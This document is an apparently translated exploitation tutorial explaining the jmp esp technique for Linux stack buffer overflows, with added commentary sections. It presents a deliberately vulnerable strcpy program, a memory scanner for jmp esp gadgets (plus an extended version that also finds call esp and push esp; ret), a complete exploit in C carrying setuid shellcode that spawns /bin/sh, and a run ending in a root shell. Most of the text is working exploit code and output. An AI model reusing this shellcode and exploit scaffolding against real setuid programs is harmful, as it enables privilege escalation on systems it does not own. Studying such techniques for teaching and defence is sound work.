1. Preface.
On Linux, buffer overflow exploits usually jump to shellcode placed on the stack; on Windows, jumping through a jmp esp instruction is the more common technique. There is nothing technically new in this article; it was just a sudden idea to change the method I normally use.
2. Comparison.
The usual approach of jumping to shellcode on the stack has its advantages: for example, the shellcode can be put in an environment variable, which gets around the length limit of the overflowed buffer. The drawback is that working out the shellcode's address is a nuisance, so a larger NOP sled is a good choice to absorb the error. jmp esp is also a good choice, because then you don't need to know the exact location of the shellcode at all, only the fixed address of a jmp esp instruction.
3. Let's see how it works.
The vulnerable program:
[netconf@linux1 test]$ cat vul.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int foo(char *s1)
{
    char buffer[20];
    memset(buffer, 0, 20);
    strcpy(buffer, s1);          /* no length check: this is the overflow */
    printf("input:%s\r\n", buffer);
    return 0;
}

int main(int argc, char **argv)
{
    if (argc < 2)
    {
        printf("Usage:%s <string>\n", argv[0]);
        exit(0);
    }
    foo(argv[1]);
    exit(0);
}
A very ordinary buffer overflow: strcpy() copies argv[1] into the 20-byte buffer with no length check, so a long argument runs over the saved ebp and the return address.
The stack layout looks like this:
| AAAA......A | other contents | ebp | eip |
After the overflow it usually looks like this:
| AAAAAA......A......AAAAAAAA | shellcode address |
The saved eip is replaced with the address of the shellcode, which you have to know or guess.
The stack layout when using jmp esp:
| AAAAAAAAAAAAAAAAAAAAAA | jmp esp addr | shellcode |
Overwrite eip with the address of a jmp esp instruction. When foo() returns, ret pops that address into eip and leaves esp pointing at the next dword on the stack, which is exactly where our shellcode starts, so the jmp esp lands on it. The accuracy is much better this way, and no extra NOPs are needed to cover the jump. Two things have to hold for this: the jmp esp instruction must sit at the same address in the target process as in the process where you found it (no address randomization, same library mappings), and the stack must be executable.
First, we need an address whose contents disassemble to jmp esp (the opcode bytes ff e4). We write a small program to find such an address:
[netconf@linux1 test]$ cat findesp.c
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>

/* Start of the scan: inside the shared library region of this process (0x42xxxxxx on this box). */
unsigned int i = 0x4211cc79;
unsigned int a = 0;
unsigned char *p;

int foo(void);

/* Reading an unmapped page raises SIGSEGV: report where the scan stopped and quit. */
void de(int j)
{
    printf("\r\nGot SIGSEGV:");
    printf("%p\r\n", p + a);
    exit(0);
}

int main(void)
{
    p = (unsigned char *)i;
    signal(SIGSEGV, de);
    foo();
    return 0;
}

/* Walk memory byte by byte looking for ff e4, the encoding of jmp esp. */
int foo(void)
{
    while ((unsigned int)p + a < 0xbfffffff)
    {
        if ((*(p + a) == 0xff) && (*(p + a + 1) == 0xe4))
        {
            printf("found it!!,p addr:%p\n", p + a);
            fflush(stdout);   /* make sure the hit is printed before a later SIGSEGV */
            a += 2;
            continue;
        }
        a++;
    }
    exit(0);
}
Run it:
[netconf@linux1 test]$ ./findesp
found it!!,p addr:0x4211ccf7
found it!!,p addr:0x4211dd5b
found it!!,p addr:0x4211dee7
found it!!,p addr:0x4211e15f
found it!!,p addr:0x4211e59f
found it!!,p addr:0x42125aa3
found it!!,p addr:0x42125c13
Got SIGSEGV:0x4212f000
[netconf@linux1 test]$
Not bad: we got a whole list of addresses meeting the condition. Pick any one of them, as long as it contains no 0x00 byte, since the overflow is delivered by strcpy() and the copy would be cut off there. Note that the scan reads the memory of findesp itself; the addresses are valid for vul only because both processes map the same shared libraries at the same addresses on this system.
So we can write an exploit like this:
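A scanner in the same spirit as findesp.c, added here as an example (it is not code from the original article): the scan itself is a pure function over a byte buffer, and instead of a hard-coded start address and a SIGSEGV handler, main() walks the process's readable mappings from /proc/self/maps (Linux only). It goes beyond the article in also accepting call esp and push esp; ret, which hand control to esp just like jmp esp does, and it applies the no-0x00-byte rule to every hit. The mapping walk, the skipped [vvar]/[vsyscall] regions and the 32-bit address check (the article's target is i386) are assumptions for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Scan buf (mapped at address base in the target) for instructions that
 * transfer control to wherever esp points. jmp esp (ff e4) is what the
 * article searches for; call esp (ff d4) and push esp; ret (54 c3) do the
 * same job and are included as a generalization. Returns the number of
 * hits stored in out (at most max_out). */
size_t find_esp_gadgets(const unsigned char *buf, size_t len, uintptr_t base,
                        uintptr_t *out, size_t max_out)
{
    size_t n = 0;
    for (size_t i = 0; i + 1 < len && n < max_out; i++) {
        unsigned char b0 = buf[i], b1 = buf[i + 1];
        if ((b0 == 0xff && b1 == 0xe4) ||   /* jmp esp       */
            (b0 == 0xff && b1 == 0xd4) ||   /* call esp      */
            (b0 == 0x54 && b1 == 0xc3))     /* push esp; ret */
            out[n++] = base + i;
    }
    return n;
}

/* The overflow is delivered by strcpy(), so the address must survive as a
 * C string: none of its four little-endian bytes may be 0x00. Checks the
 * low 32 bits only, matching the article's 32-bit target. */
int addr_has_nul(uint32_t addr)
{
    for (int i = 0; i < 4; i++)
        if (((addr >> (8 * i)) & 0xff) == 0)
            return 1;
    return 0;
}

/* Same scan over this process's own readable mappings via /proc/self/maps
 * (Linux). Walking the map avoids faulting on unmapped pages, which is what
 * findesp.c's SIGSEGV handler exists to catch. */
int main(void)
{
    FILE *maps = fopen("/proc/self/maps", "r");
    if (!maps) { perror("/proc/self/maps"); return 1; }
    char line[512];
    while (fgets(line, sizeof line, maps)) {
        unsigned long lo, hi;
        char perms[8];
        if (sscanf(line, "%lx-%lx %7s", &lo, &hi, perms) != 3 || perms[0] != 'r')
            continue;
        /* special kernel regions that can fault on read despite the 'r' */
        if (strstr(line, "[vvar]") || strstr(line, "[vsyscall]"))
            continue;
        uintptr_t hits[64];
        size_t n = find_esp_gadgets((const unsigned char *)lo, hi - lo, lo, hits, 64);
        for (size_t i = 0; i < n; i++)
            printf("%#lx%s\n", (unsigned long)hits[i],
                   addr_has_nul((uint32_t)hits[i]) ? "  (contains 0x00, unusable with strcpy)" : "");
    }
    fclose(maps);
    return 0;
}
```

On a modern distribution the addresses printed change on every run because of ASLR, which is exactly why the article's fixed 0x42125aa3 only works on a system without it.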
[netconf@linux1 test]$ cat exp.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* one of the jmp esp addresses found by findesp (no 0x00 byte in it) */
#define JMPESP 0x42125aa3
char progname[] = "./vul";

char shellcode[] =
"\x31\xdb\x31\xc9\x31\xd2\x31\xc0\xb0\xa4\xcd\x80"
"\x89\xd8\xb0\x17\xcd\x80"
"\x31\xc0\x50\x50\xb0\xb5\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc, char **argv)
{
    char buffer[1024];
    int num = 44;   /* bytes from the start of buffer[20] to the saved eip in this build of vul */

    memset(buffer, 0, 1024);
    memset(buffer, 'A', num);
    /* saved eip <- JMPESP, little-endian */
    buffer[num++] = JMPESP & 0xff;
    buffer[num++] = (JMPESP >> 8) & 0xff;
    buffer[num++] = (JMPESP >> 16) & 0xff;
    buffer[num++] = (JMPESP >> 24) & 0xff;
    /* shellcode goes right after the return address, where esp points after ret */
    memcpy(buffer + num, shellcode, sizeof(shellcode));
    execl(progname, progname, buffer, NULL);
    perror("execl");
    return 1;
}
Short program, isn't it?
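A check worth running before firing exp.c, added here as an example and not part of the original article: build the payload the way exp.c lays it out, then simulate the strcpy() in vul.c to confirm that the whole thing reaches the stack. The 44-byte offset and the address 0x42125aa3 are the article's values; the 4-byte int3 stand-in for the shellcode is constructed, and 0x4212f000 is used only as an address that contains a 0x00 byte, not as a known jmp esp location.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Lay out the jmp esp payload exactly as exp.c does:
 *   [offset bytes of padding][gadget address, little-endian][shellcode]
 * Returns the total payload length, or 0 if out cannot hold it plus a NUL. */
size_t build_payload(unsigned char *out, size_t out_len, size_t offset,
                     uint32_t gadget, const unsigned char *sc, size_t sc_len)
{
    size_t total = offset + 4 + sc_len;
    if (total + 1 > out_len)
        return 0;
    memset(out, 'A', offset);
    out[offset + 0] = gadget & 0xff;          /* x86 is little-endian: low byte first */
    out[offset + 1] = (gadget >> 8) & 0xff;
    out[offset + 2] = (gadget >> 16) & 0xff;
    out[offset + 3] = (gadget >> 24) & 0xff;
    memcpy(out + offset + 4, sc, sc_len);
    out[total] = '\0';
    return total;
}

/* vul.c delivers the payload with strcpy(), which stops at the first 0x00.
 * Simulate that copy and return how many bytes actually land in the buffer. */
size_t strcpy_delivers(const unsigned char *payload, size_t len)
{
    size_t n = 0;
    while (n < len && payload[n] != '\0')
        n++;
    return n;
}

/* 1 if the payload survives strcpy() whole, 0 if it is truncated. The exploit
 * needs the whole thing: the saved eip must be overwritten completely, and the
 * shellcode must follow it intact because esp points right after the return
 * address once ret has executed. */
int payload_intact(const unsigned char *payload, size_t len)
{
    return strcpy_delivers(payload, len) == len;
}

int main(void)
{
    /* constructed stand-in for shellcode: four int3 instructions, not a real shell spawner */
    static const unsigned char sc[] = { 0xcc, 0xcc, 0xcc, 0xcc };
    unsigned char buf[1024];

    /* 0x42125aa3, from the findesp output, has no 0x00 byte */
    size_t len = build_payload(buf, sizeof buf, 44, 0x42125aa3, sc, sizeof sc);
    printf("good address: %zu of %zu bytes delivered, intact=%d\n",
           strcpy_delivers(buf, len), len, payload_intact(buf, len));

    /* an address whose low byte is 0x00: strcpy stops before the saved eip is even touched */
    len = build_payload(buf, sizeof buf, 44, 0x4212f000, sc, sizeof sc);
    printf("bad address:  %zu of %zu bytes delivered, intact=%d\n",
           strcpy_delivers(buf, len), len, payload_intact(buf, len));
    return 0;
}
```

The same check applies to the shellcode itself: any 0x00 byte inside it truncates the copy just as an address with a 0x00 byte does, which is why the shellcode in exp.c zeroes registers with xor instead of mov.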
[netconf@linux1 test]$ ./exp
input:AAAA...A (followed by the unprintable jmp esp address and shellcode bytes, ending in /bin/sh)
sh-2.05b#
Done, easy.